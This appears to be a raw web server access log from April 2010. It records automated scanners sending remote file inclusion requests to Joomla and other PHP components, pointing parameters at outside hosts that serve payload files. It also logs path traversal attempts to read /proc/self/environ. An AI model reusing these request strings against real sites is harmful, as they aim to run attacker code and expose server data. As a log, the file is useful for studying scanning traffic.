74.55.170.226 - - [28/Apr/2010:06:50:41 -0500] "GET //skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:50:41 -0500] "GET /logs//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:50:41 -0500] "GET /logs/access_log.1264550400//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:50:59 -0500] "GET /logs/access_log.1266451200//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:50:59 -0500] "GET /logs/access_log.1264636800//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:50:59 -0500] "GET /logs//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:50:59 -0500] "GET //skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:04 -0500] "GET /logs/access_log.1266451200//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:04 -0500] "GET /logs//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:04 -0500] "GET /logs/access_log.1264636800//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:04 -0500] "GET //skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:05 -0500] "GET /logs//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:05 -0500] "GET //skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:05 -0500] "GET /logs//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:05 -0500] "GET //skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:05 -0500] "GET /logs/access_log.1265760000//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:05 -0500] "GET /logs/access_log.1265760000//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.195.112.180 - - [28/Apr/2010:06:51:07 -0500] "GET /logs/access_log.1230422400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.67.201.187 - - [28/Apr/2010:06:51:13 -0500] "GET /logs/access_log.1264636800//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:13 -0500] "GET /logs/access_log.1264636800//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:51:15 -0500] "GET /logs//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:51:15 -0500] "GET //skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:51:15 -0500] "GET /logs/access_log.1264723200//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:51:15 -0500] "GET /logs/access_log.1264550400//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:20 -0500] "GET //skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:20 -0500] "GET /logs//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:20 -0500] "GET /logs/access_log.1265760000//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:20 -0500] "GET //skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:20 -0500] "GET /logs//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:20 -0500] "GET /logs/access_log.1265760000//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:28 -0500] "GET /logs/access_log.1264636800//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.67.201.187 - - [28/Apr/2010:06:51:28 -0500] "GET /logs/access_log.1264636800//skin/board/default/doctype.php?dir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.207.45 - - [28/Apr/2010:06:52:17 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.170.226 - - [28/Apr/2010:06:52:22 -0500] "GET /logs//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:52:22 -0500] "GET //skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:52:22 -0500] "GET /logs/access_log.1264723200//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:52:22 -0500] "GET /logs/access_log.1264550400//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:52:35 -0500] "GET /logs/access_log.1264723200//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:52:35 -0500] "GET /logs/access_log.1264550400//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:52:35 -0500] "GET /logs//skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.55.170.226 - - [28/Apr/2010:06:52:35 -0500] "GET //skin/jaemanstyle_s01_blue/setup.php?dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
92.241.190.214 - - [28/Apr/2010:06:54:21 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.waterdistrict2.com/poll/image/TRQ1.jpg? HTTP/1.1" 404 342 "-""Mozilla/5.0"
92.241.190.214 - - [28/Apr/2010:06:54:21 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.waterdistrict2.com/poll/image/TRQ1.jpg? HTTP/1.1" 404 313 "-""Mozilla/5.0"
92.241.190.214 - - [28/Apr/2010:06:54:21 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.waterdistrict2.com/poll/image/TRQ1.jpg? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:06:57:16 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:06:57:16 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:06:57:16 -0500] "GET /logs/access_log.1219363200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 355 "-""Mozilla/5.0"
195.190.166.35 - - [28/Apr/2010:06:58:22 -0500] "GET /logs/access_log.1205539200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
195.190.166.35 - - [28/Apr/2010:06:58:22 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
195.190.166.35 - - [28/Apr/2010:06:58:22 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
69.175.59.242 - - [28/Apr/2010:06:58:22 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:06:58:22 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.175.59.242 - - [28/Apr/2010:06:58:22 -0500] "GET /logs/access_log.1219363200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 355 "-""Mozilla/5.0"
195.190.166.35 - - [28/Apr/2010:06:58:26 -0500] "GET /logs/access_log.1209600000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
213.251.189.204 - - [28/Apr/2010:06:58:37 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:06:58:37 -0500] "GET /logs/access_log.1270684800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:06:58:37 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
92.241.190.214 - - [28/Apr/2010:06:58:40 -0500] "GET /logs/access_log.1220054400/modules/My_eGallery/index.php?basepath=http://www.waterdistrict2.com/poll/image/TRQ1.jpg? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.190.166.35 - - [28/Apr/2010:07:00:00 -0500] "GET /logs/access_log.1209600000%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
67.195.112.180 - - [28/Apr/2010:07:00:31 -0500] "GET /logs/access_log.1253664000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.251.189.204 - - [28/Apr/2010:07:00:36 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:00:36 -0500] "GET /logs/access_log.1268956800//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:00:36 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:00:36 -0500] "GET /logs/access_log.1270684800//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.55.146.200 - - [28/Apr/2010:07:01:00 -0500] "GET /logs/access_log.1209600000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
72.55.146.200 - - [28/Apr/2010:07:01:00 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
72.55.146.200 - - [28/Apr/2010:07:01:00 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
72.55.146.200 - - [28/Apr/2010:07:01:17 -0500] "GET /logs/access_log.1209600000%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
122.199.140.158 - - [28/Apr/2010:07:02:38 -0500] "GET /logs/access_log.1212969600/errors.php?error=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:06:58 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:06:58 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:06:59 -0500] "GET /logs/access_log.1268956800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.190.166.35 - - [28/Apr/2010:07:06:59 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
195.190.166.35 - - [28/Apr/2010:07:06:59 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
195.190.166.35 - - [28/Apr/2010:07:06:59 -0500] "GET /logs/access_log.1212451200%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
213.251.189.204 - - [28/Apr/2010:07:07:08 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.55.146.200 - - [28/Apr/2010:07:07:45 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
72.55.146.200 - - [28/Apr/2010:07:07:45 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
72.55.146.200 - - [28/Apr/2010:07:07:45 -0500] "GET /logs/access_log.1212451200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
72.55.146.200 - - [28/Apr/2010:07:08:37 -0500] "GET /logs/access_log.1212624000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
72.55.146.200 - - [28/Apr/2010:07:08:59 -0500] "GET /logs/access_log.1212451200%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
195.190.166.35 - - [28/Apr/2010:07:10:40 -0500] "GET /logs/access_log.1212451200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
195.190.166.35 - - [28/Apr/2010:07:10:52 -0500] "GET /logs/access_log.1212624000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
84.38.160.77 - - [28/Apr/2010:07:12:02 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
84.38.160.77 - - [28/Apr/2010:07:12:02 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
84.38.160.77 - - [28/Apr/2010:07:12:02 -0500] "GET /logs/access_log.1212451200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.76"
213.251.189.204 - - [28/Apr/2010:07:12:20 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:12:20 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.251.189.204 - - [28/Apr/2010:07:12:20 -0500] "GET /logs/access_log.1270684800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:12:36 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:12:37 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:12:37 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:12:37 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:12:38 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:12:38 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.38.160.77 - - [28/Apr/2010:07:12:39 -0500] "GET /logs/access_log.1209600000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.76"
84.38.160.77 - - [28/Apr/2010:07:12:39 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
84.38.160.77 - - [28/Apr/2010:07:12:40 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
213.251.189.204 - - [28/Apr/2010:07:12:44 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:12:48 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:12:48 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:12:49 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:13:06 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:13:13 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:13:21 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:07:13:24 -0500] "GET //bbs//skin/zina02_green/write.php?dir=http://planetwork-team.do.am/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:07:13:27 -0500] "GET /logs//bbs//skin/zina02_green/write.php?dir=http://planetwork-team.do.am/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:07:13:27 -0500] "GET /logs/access_log.1262995200//bbs//skin/zina02_green/write.php?dir=http://planetwork-team.do.am/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
84.38.160.77 - - [28/Apr/2010:07:13:37 -0500] "GET /logs/access_log.1209600000%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.76"
84.38.160.77 - - [28/Apr/2010:07:13:42 -0500] "GET /logs/access_log.1212624000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 355 "-""libwww-perl/5.76"
216.97.239.115 - - [28/Apr/2010:07:13:57 -0500] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 337 "-""libwww-perl/5.819"
216.97.239.115 - - [28/Apr/2010:07:13:57 -0500] "GET /components/com_moofaq/includes/file_includer.php?gzip=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 332 "-""libwww-perl/5.819"
84.38.160.77 - - [28/Apr/2010:07:14:29 -0500] "GET /logs/access_log.1212451200%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt???%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.76"
204.15.190.163 - - [28/Apr/2010:07:15:24 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:24 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:24 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:27 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:27 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:27 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:35 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.decons.ru/images/fxid.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:35 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.decons.ru/images/fxid.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:35 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.decons.ru/images/fxid.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.228.161.3 - - [28/Apr/2010:07:15:48 -0500] "GET //index.php?sayfa=http://www.rostopt.ru///ad4f9f6db6ba0d26b52da46647bd39a6-julia/roxx.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.828"
204.15.190.163 - - [28/Apr/2010:07:15:50 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.15.190.163 - - [28/Apr/2010:07:15:57 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
